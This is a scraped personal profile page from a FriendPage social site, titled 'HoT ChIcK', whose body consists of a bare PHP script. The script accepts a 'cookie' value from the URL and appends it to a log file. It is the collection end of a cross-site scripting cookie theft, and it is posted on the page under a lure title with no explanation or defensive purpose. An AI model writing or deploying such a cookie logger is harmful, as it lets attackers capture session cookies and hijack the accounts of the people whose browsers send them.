Home | Make a FriendPage! | Member Login | Browse Pages | Help

tonygraffiti

Views



HoT ChIcK


HoT ChIcK
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo "Error: Unable to write to the log file";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo "Error while writing to log file";
exit;
}
}
echo "Successfully wrote a string to the log file";
fclose($handle);
exit;
}
echo "nothing to write to the log file";
exit;
?>


Home | Make a FriendPage! | Member Login | Browse Pages | Help

Copyright © 1998-2010 Friendfinder,Inc. All rights reserved.
Friendpages is a trademark of Friendfinder,Inc

[Terms of Use] [Privacy Policy]